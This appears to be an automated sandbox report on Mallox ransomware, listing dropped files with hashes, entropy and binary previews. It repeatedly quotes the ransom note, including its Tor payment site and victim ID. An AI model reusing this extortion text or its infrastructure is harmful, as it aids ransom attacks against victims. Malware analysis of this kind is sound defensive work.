                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\EFI\Microsoft\Recovery\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Java\jre-1.8\lib\deploy\ffjcext.zip

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14264
                    Entropy (8bit):7.987066198103358
                    Encrypted:false
                    SSDEEP:384:Zl6DVBIpWxj+SZI72gLXGfogDQukwGyOQ:D6DV+Wm72gGfoUnkwX
                    MD5:F54B7231E253E7BB6BD9EBB4AD96EBCF
                    SHA1:8E058CAA3B9BE62FF86BCE36FA52ED4149079AA1
                    SHA-256:436C27FF9343553B2FE77750534506D74F582252FD537BED54B32F5EB78A35A2
                    SHA-512:AFA3126AE64DAEAE449B0B7AA05428E80FC509C03B90F58F2918668A705411B1065FA6F54D2C3B19FA3C5CCF96BDF3927424D2C58ECE6AAEC146747A432BF784
                    Malicious:false
                    Preview:..*.GVY;.].?q....bwm(...x.q.3.Gr.......G.M.y...S....]..!O}0..1.::......^.?..S!\j>..`.....U.(.Ke..H.<'.jPF.....(...B...:.$...G%..0...H.}..A.A.B....uCn%....l.Bb... ...0%1....>^..Q;~.5YF.r.."..p..9...).....y......S...[.....L%...o.9h.....*.{!UO.+...f.3..6.G....^.....*0.(h()..j...n."gH...,............^.uqa...-..U...w......T....?2...E$.F...I....Y@.j..y.....[~.(..K....F...?...-.:.Djsl.I......g...5.....N/n.i..G.~..A.......[..h......%jm$.e!.=S.xp..9...#.Acmk...f...T.&sS..)....7F.O.0.P^..NL?.w...2.6..u......Ef.h.zLP..N...n..|.....b.P.....M...6..H.....0V.!;:....".j...Vt.....^s...;._.3}...L0mu.{...3&M............M..z....R.~..I...:7bo....:P.L&.>].1p..........UL.k...'....>7..].f.@.w5Sw...d.r.w.3j..}.Z"`..1n#m^.i..t...\1....6p.[..7.....;.$.].....m0...$: .. .(1........Y5....*jm.......i..M5up.E0.o.8...,.....=...._..tS3;..i...;].......2.R&.K.Xy?.S.*...{o.s.......oq...J;!.M.[4..+...~+.....a......@.5...Io.....&@...5..o.......K.....C....ld9.mn...>^.oI..V..W.

                    C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Lync.Model.zip

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):91301
                    Entropy (8bit):7.997900175340737
                    Encrypted:true
                    SSDEEP:1536:Nct+v2SutNGQxO1dMF/+GzZ4KbOLNP3LRSekqNExC7IaeGYOF5+3I8+ztQfdMDDH:6+2S+MQPbbOl39GqGFtdO+iQfQXz
                    MD5:D4ED110E0E5A84BCBB4208975E601403
                    SHA1:C464C1C841E99FBDD12F89481C607649F7DF4A99
                    SHA-256:18C8F7D5EFF17856D6ADB126E66FB3824A598151B4EEE74A113BCACF5AF4B72F
                    SHA-512:F3DE584D555CC61799D095BFA601A05B74C88429EDFFB8A7A7FB7D1A08E82F860C0AECAAA3BAAC8BA52640DC1DB42B047C665DAC9C6D8E00604F6686849507BD
                    Malicious:true
                    Preview:Z2..v.;..[.....G..x.s./-......d..&J...X.5.D^i.:..Y.J1.J...T.3....".&|.....}M'.HB..'...Z.....[F.........?!.Xxq.]...|]M..<.E....6..!p.S.e.i....8..7.. ...P5.N.....U.J.....5A.t...V<.AQ>..y.j.{.NcP8@N....+...>.hk..n...s....5.L.....-..#.s.5....cDK@' '.2<... .^\Nc.....se..2.............|.....S.?/..jz.......8c.+.n6.-../N.Fr.m........^Q.j`:.yO%!...&.(."....?..:.......`.....<H..#H...."..q.._.r...`..Jt...N?...7M......$zS.2...=.c^./-/.!.I.l...0.....[.E..$W.H.[.Df.~..^.....-.........^......F8.0.....V.:_h..f,....wyM.........q.}c........"...[..^....Q.N..Q....d....`..=.yA.4d....Q..0.3.r.'}*2..|..R.Y..{...J.R.u.J....pF52.?.$.M.VeJ.y.....&........5.C.s.[u..93k...`$....&...".y....(.0....-.!.P..:...9...R..%7%....5Z8...Y.....c....Y[.u.%..^q....;4.W..q.d.NC....At..q`h[....j.y\...>.."...?.#..;n.-.}...f...J.......w..#V..w..r.!.......*....=3.;DO.l..4..#....c...-.....u.m.~.".q........S$.OE'c..g....b.Rp......|._...9?....4B_.6%.. ....../..e.v.oP....V.".;.g.

                    C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Lync.Utilities.Controls.zip

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:COM executable for DOS
                    Category:dropped
                    Size (bytes):29233
                    Entropy (8bit):7.993314684122543
                    Encrypted:true
                    SSDEEP:384:hKAODpNKhkAy1lj/D5crEANEjFqyCyYn5sKTLkLvOr3aoZ3YP9VE9pfFuAA2CxZr:IAgpXBr2rACyYzWYKowo3oAA2o3b
                    MD5:B664D3C2029976DAEC0723794AF492EF
                    SHA1:11FE11E7C04E0BFC6DD21C97129D384519550FE9
                    SHA-256:3DB6C506BA4995EE2948833EEECBD74F496A7771B24236444D0832D1BDB4E025
                    SHA-512:70F8BD81B216E399B6B36F1ADE7CABA016E4501F4A31BE2DE42F5A7755383DB364E26001860B23E21992CBF3E07D340F4B87BDC1822BBAEE6019D0FE981F2A14
                    Malicious:true
                    Preview:...N\..E..a J........+.I....E..N....!..|..&u7p\...].w.^.......O.../.^YMH....z.t...C2......B.<....-_..Q....n....&.......I.e...<9%....W......7.%.............szQ.OsHu4;%.'....,/.......@U[..X......Mt.d....R.Xtx$....U.*._.7E.9r.e +.+.x.t....(...f2.m..l.<..q.9.V.4.g....{.}..6....Dr..'e.....wP...H....6.._.^EUm~.3fl..X3......y......w.w....j._..=`,"..P...x.t..I..w.r.T..{.=....T[..zZP.....,x.0.\.Q.D.....q...vw.J....!,..2..'.;......`..3...1.#Y....={..$Z<..(..m...R<j...F..s..Bf...|.V..VdE;...{.....l.e>....o.(Z..;.....N....~...b.........-z.E.?.X...6.6.7.&...(....,..8....gR.M...0E'6....I..#.Q .....>.....m4..&qz.e.Q.........+;....ac.g.j....>..B.?...<...].[...+..\L..VU'...D..f..:G.R..Hv.. .@.S'....K....'.^..WH.J..r.4...]%.&...?D.i...S|85...#9V.E.....6.;.![.TO.....M'.2NW:...Q...4..E.......<....Z.f.c...yfh....U..o.=....|..T.T&..b..o.1.3...g.......g...SR..-.;..C.9..{ja.?..............~..{.&`8cG...elM..}x........~.;.:I..$;..6..\.Vzs..Gq....f.F....t>.>...

                    C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Lync.Utilities.zip

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):70789
                    Entropy (8bit):7.99735769972974
                    Encrypted:true
                    SSDEEP:1536:t1+eE95C8TZKeCe5aSpv2VgR3K1MFGuZhunhJi+u:t1xE95C8ow2VgRo8SW
                    MD5:300C6803A132A2CBD46F5E4F4DA85684
                    SHA1:BABE82067CBBBED7E826832CEAF456AE8DE2A1A9
                    SHA-256:D15AFF9C5AF930D4F55AF94B81FE05641970EF9FCA82393BD2513D3D614DC60B
                    SHA-512:489AE8B8EE1A8B953FE3E5310F4E4FDC918BFDCDD897DFC385C861D85A7B86ABF76A4F2F08AD71327225BBBEB519965978CB75848B5B350B05BBA1D6D52E3217
                    Malicious:true
                    Preview:.x.&.S....0,..C.j.....Zt.2.}"...0.\.:^X..z....Zs.8......s.@....#......:X.q..=..1....~.0..`..6..3.W..H.../.=.3h.d............P..1..5t.Y}w..i..a..S....7.=..~X....b.x...k.7........3.. ...5D..X...6.1u.v.q..:0.u...#..d.Zu......s /N...C0.iT.'.l...c.Q.g....;...]Nd...!Y.-.....(..a..c%.]...t.C.$?....V'.5.i;.P...5......9.V..&v...rt.......J.. i.0.p...."sM*.j.V`.G....'n..%.:."|..t....2.q..D.#.g..&>.;A...e...}....#..Z..CQ.{.....N.<......v2.../t].2.k..y_..A.>~.."..v......"A9..(..s".B.....A.G....h.k"...........t.uBP...=......j..T.....-.r}5..{9V.0{...)..."*..~.{.-U...e\.m.......j......h.|.....PQL....O.g...&..k..1..... ...<.......^...s.5w.....t...9.b.U...s.e......v.UAS........zu.*.............t.PK. R.J..%.G...N..mcHv.4..p......3c...bhz...+-.0%.E\.J88...7!XB...jbv.X.....fl.<.X..QP..q...- .Q|.1K.82.0!......7.`^..s..?..<3qW..'...==S......'.......].~..O...}.h..Iy....C.f&..0.{.Q}.D...2..8.S.z.Ge!.QX!Qzk.h....b)..5K.?i....'1N....rf.d.Y.F.6.2...=.........Fe

                    C:\Program Files (x86)\Microsoft Office\root\Office16\Ocomprivate.zip

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):88634
                    Entropy (8bit):7.9982799417848485
                    Encrypted:true
                    SSDEEP:1536:sk3LAB6OpPa2gYsxOVrveRXnZPblNTMRDqiWZp0LBWSTRGtbUANCR3UlNkAcA:aoOpPmYsORSnlfMRGJp0LfVGtb8hU3
                    MD5:5F2236B2302E94E29EB794079609E4C1
                    SHA1:9BA62378A56C22ADA286ED396E65BC98650BDFDD
                    SHA-256:8E16AD7BEE3814AA39A3E64E13E0AA78A6EEC4EF43A0B70B0B29E6E89656A6AF
                    SHA-512:FC9634424568DEA47E09EEB9FEEE75D205165A7ED4DEE4A671B094FC2A4E4D8A45D145DBFC1AC7525E3C851121A6F90E89ABE0C18B22D1A059474F9692EE164F
                    Malicious:true
                    Preview:...xfR......#"i:....X|t.N4y..=..+..E...........<pg..o....Oa..^8!.....I......H...[4..Yt].xrXM/.._..52.Q.*m.F.B.;...........WQr|.s...^..d|...:.I.i.#1..r .{7..J..........tk.Q$....5.x).........'D.s .h...x....1....a...*.83..6..D...WF....:A.y..).:.....=.0.w^......8..^L.....59....p..T.f...%(Q.V..S.......D.a.[.lW.Hi\.+Pa.g.-8I.p6..z.w.2D.B.0"e..5.)Jg...J..%.yhh.o....e.....6[.gK......).6i...;wX:.]..+.K......2.......jQJ....`..Eyx......nt.K7}.H.........]...MuP.8..Ud..t....:....3$."...<.{ }D.s.'...=QfG+.mq...@...7.a...?K.6.u...^/4c..s.<...`......6X...No.d..+...........>..............~.....-..5......?S%...........G......MY.h.A.....T....p.ZJ....-.V,u.e.....8/..\M>..zO..0..4........<.ZQ....V.....8%..L.-_+.....e.K..\...G.S...($..AE.;PrI5...;......d>H....*....(r..t.*nT.p......Y.....<~....%.Ey.bwS.h.)m.v"....uc..;...SX.\.....G.^..i/.....^.i.J....IX.C..*.....EP..t....... ............hG....p\'X....l1.....h....~...q(<..Lv...%VA+..p7.&.

                    C:\Program Files (x86)\Microsoft Office\root\Office16\System.Windows.Controls.Theming.Toolkit.zip

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11636
                    Entropy (8bit):7.984810466194793
                    Encrypted:false
                    SSDEEP:192:LjOb6v9gSSjt7/FM15zJN9xIlQV4dA4xC432hoLxgHUOpdBkBbD2cKWHHemmdFgP:2+m5RY5FxIG0LCNTdBkPNHXmngP
                    MD5:12EE69BAC75ED8D98A477010F5D376AC
                    SHA1:4C372F2D3E78F70EED175D5D3DADC58DEBD34737
                    SHA-256:424A7AE99E23B5E668042E418441BB96B613A6584D60727868B5EEDD6449CC46
                    SHA-512:680E56DBD991409C0B00A4D5CDA20489F5064698FB0C571685E07CE5318563CAA04E9966D9C6BB8BF2BE738C226ADC33A35D4CC0AAECEB44A282CD96291935B8
                    Malicious:false
                    Preview:;.dS.....V..W/rI.....e..o.. #.5.3.Z......]..Z...=<z.9j..+.}3UiqY.C..7..ZF..!; .-s^.. ...t..i..,!.w..e.lH..9..O.!)T5|`*y..........D...?..If.)..0'.=x..@....e....r."Zm...v9...N.f..?.z........:..)0.t.6..(..C...R.5":...jB..$F.....N8.....F....1s...A...j.J...&.hu....4."aj].O..ST...0...W.G.'I.s...h.^!?>q.`e=....tifm..>.i.. [...'...>....<.O.).m.w.N.U.).B..?(.....m..Gis...N.Y.>.5.*.N..t....U3.`.O)*.....uRtz......y...MAr...fq.p2,Q...d....0....Tq.o........P.m.....[.......R..\7a..[.]...4...65..@.E+'..F......9.....]c.a.h..#P.>#.Q....h)y..#.....P.eA....|.Lv...5.n.*Z.vD..[....q.]i..H.X.u.lz./....uQ.........T..n.r{H......E.I..zE..>Y......$C....B;.u..&s.N....<.$cU+....>..>]..a.(...].p.&..R_/..p....s@..e.o"..Q.ePU.Uk^....r...Y0G.mS......Q.w`ah7.iS...0....|7x[....Sn...zQ.*..&.X...-=&h...M.....Kb...4.2.w.(!.|;.\.e\.....j.Y;...KAa?wm1...WH.0Y..P...e>......F].>........?Wzqr.F.j.J, .`..#!B...,v..?4...S.Q..:.......:..6.[.:.[./3...6..p...d..<.a*.A]a?.IhbY..q.......

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):215820
                    Entropy (8bit):7.999196893739708
                    Encrypted:true
                    SSDEEP:6144:UAtM3Al0xS6iY23kh06lEOiBvozBQtmgwyt:hEAlN6iY23k26lEzBdt3xt
                    MD5:B2017B1EA5742319E823DE6C174D2AEA
                    SHA1:0A76982BCC0F28EB45EDA103848A51D95ADC295E
                    SHA-256:57608A6AC104520E91731F5BFDCAC765091F68B5B73FD6FC00AC4EB359E3B1A6
                    SHA-512:78C64CA23A807BEE2D662786AC51FECE258AEF35E66C755397CFA1A96642B29AAD0B864482FAB7C4D09E5087909F758C81298BC616EC1C56D944C1356B64C9E5
                    Malicious:true
                    Preview:7.............U.h.'S.0l.<.!|..*kS`... .......G.c.R..h.p..."h....Z?`_..mJ..`(.~(`.y}#..z...zI+v].8.73.iX...j..5..*............c.{.d..i..vma.I...2n..2BSh.A...u.)...s$C.V..Z..=T|;=....5.5.).....F...J....{..]..~...G..@lt.$...".'..\T..@.vV..<MB.. ..NJ.\...G.....m./....M.6.x..2..,...E...T..~VW-......H.i.^.o_.....5;4.!3...a*Zw!.(.NU..Pt29..}./{..._.+<p.=O..z. ....*.VI.....KO....m,...(_.tK....]..%a..2i.......B.....1......s.H..o.....))..m....I...2.l.4D.K...:...'G....#.1....0.6.Cm...^../$....D..nF\.*N9....._.\..X0.S.'.1=...7.E....Pm.8...ea.W.....$...5L..q.w.....w....u..=.?.Z.K=.p%+.:...Q.6..{f..>K...n6;`.$6....%#...z..5O.`.y.`.Q-.._b..........T...(...`.<.k|\...eQXp..y.F....K.F*.C=J@.=EHx....^t.`.....%h..M...ox.d..E.v.1...{;.Q.D.G.^&Eu_..b.@.n...@.cW....UM.=V.~...;......r...b*.Pz.u...K..`L..#[..F..s)......C+x..ae.S..n..,/.....-m.v.e... ..b..0..x..7.F.......+. ..Q....8i''...s.$..+jr.3...V.Y....Hsq..+...C....C..cl.v..O.+8...d-i.H"U..bm%.M&.r..

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\fabric.js.map.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):737532
                    Entropy (8bit):7.999746944471967
                    Encrypted:true
                    SSDEEP:12288:lXMtw5MQ8DRscxoqZ6S7ybANHYKCheS5yH6gIZviIOzX7yENdy9KsNYL9d1:lXMtw5MQICzUybOkcfIZviHyQy9K0Un
                    MD5:6564CDFC1133B9830B3B2472614A8938
                    SHA1:0BE168B74E1138BD8B4544B2AACDA655ABF4424D
                    SHA-256:C39B9E560733594ADFB81DC230BAEA22163AE8353C6CDB0E47F53DA1BD858C4A
                    SHA-512:A7A3D9DD57C56B26C62D7B7A87085F76B429151A4CD8EAEFE03C36DD591565A509310ABB2ACC494A61E4A380CBF26AE6977776435A4C2571F7782BE084BF561F
                    Malicious:true
                    Preview:.n../.4......t ?:...J.{|(,.=..bx.l..@.3*.~...u^|..Ui..G...i.V.?+...@...6..w|.O.vk7.k?.iM...U.k:(..{.....9Z..M.\..r.5......^O......p.L.....o.f8...E.@.V.VM.H.K...=.......A].......X.7<.Jb2. .J..)a.?3......q..V.(....9.....F..33.K.1....A....N.H4...i......U..(w/2.._..?..I~..-...S.-.r'...>u......a.eJ.........o.F.!..MYC>.....7...(:.[...kx.%...!.....k*......._RC..f./..lM.Eu....5....osO_..R.lp.>.X..:..<i..y.......Lx..a.|].E..........:...{.W..P..r7.#..(3....'...#"..3.y..%..4\ ...'.Y.Vg.t..s....../.^......a.c.bw.....u.lQ...MQ[..P.k].u..9%.........+z.~.q...ST..79...T..`O?....&K.z..%1rA.b.N&...k.0.vO...+.LH.......s...w....F.:..-....F.K..)ik...~..{.B.d....(b.....|.)b.4@.d.K............G'tFSy..L...n_.Nf..*:.{.........Jf.$...K...f...s.$f....'.~...3..I7.Q]T._@....&...x.@.N.....U........L%...:.`.sz...2..*...z...dY8.R....(.X..}....;_.WR{...RaXd..+is...$....{cyV...]..q.s.6r1"d...V....*.%....+...p....a..TS..<C....tF.<...%..)..:...L.o.l...N5...<N...Jp}....g#

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):139001
                    Entropy (8bit):7.998787776349736
                    Encrypted:true
                    SSDEEP:3072:4kNXo/NtHMv7XkV5WQx0BJg5Xh38pCkgRcXEfy6kmRrxA:rYVtHAKwKUow/cEEf/xRVA
                    MD5:44EAE34136F5936637FA52EAB095329A
                    SHA1:922CAF10484EFA852797B774443E92DC5F6218F7
                    SHA-256:D5A51ED1674E69B7794A87BAFC964A344B8112DA269008EC264C3CAC94BAD3F1
                    SHA-512:8C5AE49EFC57D58AB36B26F0D5514B4B55CD21A4A50B596897D0F2D7E4D2C7285E1C8C2EBD01DFBA3000DD9ADADD93BB08BA8C188A50087CFE3018E535932DE2
                    Malicious:true
                    Preview:r....B.x..}.....x;.@.....$u.p.<.C...|."....u.H..3t^:.p.-.....)m.Z..db......k.3..&:..jz.._.X..T.q....$..I.....Q0.*./.._m.Ul..(.I..#OJ|......F..].;..44..f....."ycF..V..3.f...v5..-[.x.+.2..4.1....G.{._....g..E...8.yoPo}..N....p~.......J'..ep..L./.t.X.....5..O._.u...B.2..?.#.....).A...[....:.g..].j..k.+...m.N.z...]A!|xD..[....%@.......F.i..W.m....^. .G....a..}s.),...8.?..).\....V..?C..D..$d.....8.|../...<FYW}x..*jk.v....!.:T.t.W.$d....''?.........C...?d.....>......%.@...K.,...m..y.F...a.L......`..Z.mu.2..S..H...r..>=G....a.a..$........(.:....A....'....z..Z#4[.........Q..iO..F.7...'.H].'..rq:....9;..%......4...y.....:......j[.1..#.9..y-4.......Na..^KTc.1E....ugi.{.].2.p....HVve;QC....Cq.....g(.gK......j....g..8... .V..."#fdM......$..........w.... .#^)B..KsV'..M.('":........./.........v..%....*..`.p..}.^..{!.....H...q. <>.;..:..'A..7f.;..z{....:{...z....*#H.P...h2.....(|......B. ......fC-..?....Q...t...6./.$...=s`.s.......l....

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpane.js.map.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):320330
                    Entropy (8bit):7.999469823255787
                    Encrypted:true
                    SSDEEP:6144:ueBgk0/WydiQTkw8hW+6lNqVnytSd0jKq+UCHJFFJfdQBqc3jOF8ygneDPjQ1c:HgtW+NNq5ytSds+vHJhmqejV3neo6
                    MD5:BF425581320239D953098895933464D7
                    SHA1:E5FECB0FE0B42FE7E2565DAB971D89C4CC08CB09
                    SHA-256:0FB66334EDE8A3A118C1B539692EED722CDBB5D85210F7F96990DE1A3BC3A06E
                    SHA-512:2F8FA9315E0D1C5B984CFE78CE6A65F1BEC22438640B7308D769A87D1A602C0BC2AF4501FD7AE43B21E326FFC0387E8EA8A6FDBAB2D57CA995A9BFF2EEF811BC
                    Malicious:true
                    Preview:".tV.....H..4@.Y..2sz!......}.Ht@.y..\.sa9..m...+.U..T/..&.Y...:...b]..I<.AQ\....9].....>c...W.......L..A#.a...i..d..8./c..y.x...o.....8.K....:*...O...'@@..i...!.+..X...j.)"..b..-@.n-k..).../.gQg...$... ..!...../*F.p...G7......n.n.y.h.7(.iCA.T.._%.u..%...G......=.q..|*.W$.n,............N..Y..=..qt$.Q.FKW.Cz...=.'..n2...qb.H..7v...|.'....Y5.z(*p"....1...D.P.._........+..,U.".2...n\W.K../.h+.~.g3B.&...\."".....H..'........u~..^..L./.x..xsQ..%I~).+.d.\.x=*.2...K.X.>.M.V...sB..wJNC..y..o...KF.J....8tD.....|.8......>....k..........c.u4..Y.$)w.."fi..w.1..0.Q.U.....p...LmJ...N...P..G...)v?W.T...!...V.g..!.L..T,......<e8..R.N.HU+.G.....X?...3(...."..0.f .}..C/...^.../._B..@qC.Z.O^...7....VC..).b...@i..7Ju.H.E......~`d.g.......@.b7....s.-3Yo&M.iu..............*........#*..Fl....x:R..vS$...zx..}09j...n^..+.....S......b..SS.m.....?.o.p..[....m...'Mw.T+Ks...#h.....G..!..w.v..<.3..a...`Vg<.B..1.....K.=^.._..i-...n.] ~...G...n..DP....M...p....1eD......vN.

                    C:\Program Files (x86)\Microsoft Office\root\Office16\sdxs\FA000000051\dist\en-us_web\taskpanev2.js.gz

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):154390
                    Entropy (8bit):7.998607047326121
                    Encrypted:true
                    SSDEEP:3072:3MSk7lzsOapC7kiNVbuo+/980M2qvpcbQDMJHYRUpVljTRqXwVZ:3MS8WOapM4h9HOpzDe4ipVlDZ
                    MD5:1083AD6538C84F9E3D21A9836151A91B
                    SHA1:F68C6741575AD0506730E7A45225336005F44ED1
                    SHA-256:B017899F60868EB3B0DE0957AA4FC7A458ADC56BD7FAFEF3C8E5925C788A5B71
                    SHA-512:BC8867346EC286D45E0B51DC2EB00792E60FF4628BABDA12A9ED94A5C5E3DC1B06142A26083DD3479C7B265DF5A38884105B9B81191AC6BBB010073B40A0EDFE
                    Malicious:true
